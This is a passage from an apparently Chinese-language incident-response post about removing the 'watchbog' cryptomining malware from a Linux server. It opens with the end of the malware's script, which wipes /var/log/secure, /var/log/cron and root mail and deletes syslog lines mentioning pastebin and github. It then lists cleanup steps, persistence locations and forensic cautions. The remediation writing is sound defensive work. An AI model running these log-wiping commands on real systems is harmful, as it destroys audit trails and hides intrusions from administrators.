echo 0>/var/log/secure
echo 0>/var/log/cron
sed -i '/pastebin/d' /var/log/syslog
sed -i '/github/d' /var/log/syslog
echo 0>/var/spool/mail/root
fi
#
最终的解决办法是
kill进程,删除病毒文件,就可控了,只不过crontab功能废掉了
关闭crontab(临时措施:把下面列出的持久化入口清理干净后crond可以恢复,不需要一直关着)
systemctl stop crond
killall watchbog
删除掉病毒文件
/bin/watchbog
补充(按上面脚本自己列出的落地位置,只删/bin/watchbog并不够):
1. 同时结束脚本拉起的python进程(`python -c "import base64;exec(...)"`,可用`ps -ef | grep 'base64;exec'`定位);它的载荷本文未展示,不能假定是无害的。
2. 清理脚本写入的全部持久化入口:/etc/cron.d/root、/etc/cron.d/system、/var/spool/cron/root、/var/spool/cron/crontabs/root、/etc/cron.hourly/Anacron、/etc/cron.daily/Anacron、/etc/cron.monthly/Anacron、/etc/crontab里的`0 1 * * * root /bin/httpntp`一行以及/bin/httpntp本身,还有当前用户crontab里的`*/1`任务。这些文件被`touch -acmr /bin/sh`改过atime/mtime,按修改时间排查会漏掉,直接用`grep -r pastebin /etc/cron* /var/spool/cron`或`stat`看ctime。
3. 删除其余落地文件:/bin/config.json、/bin/config.txt、/bin/cpu.txt、/bin/pools.txt,/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/整个目录,以及/tmp/.tmp*、/tmp/activate、/tmp/elevate等标记文件。
4. 脚本末尾清空了/var/log/wtmp、/var/log/secure、/var/log/cron和root邮件,并删掉了syslog里含pastebin/github的行,所以本机日志已不可信,入侵时间线和来源要从云平台侧(安全组/访问日志、登录审计)查。脚本里的elevate()还执行过一个本文未展示的提权载荷,且所有下载地址都可被攻击者随时替换,能重建实例就重建;至少要轮换机器上的密钥/密码。本文没有确定最初的入侵入口,需要另行排查,否则清理后还会再次被感染。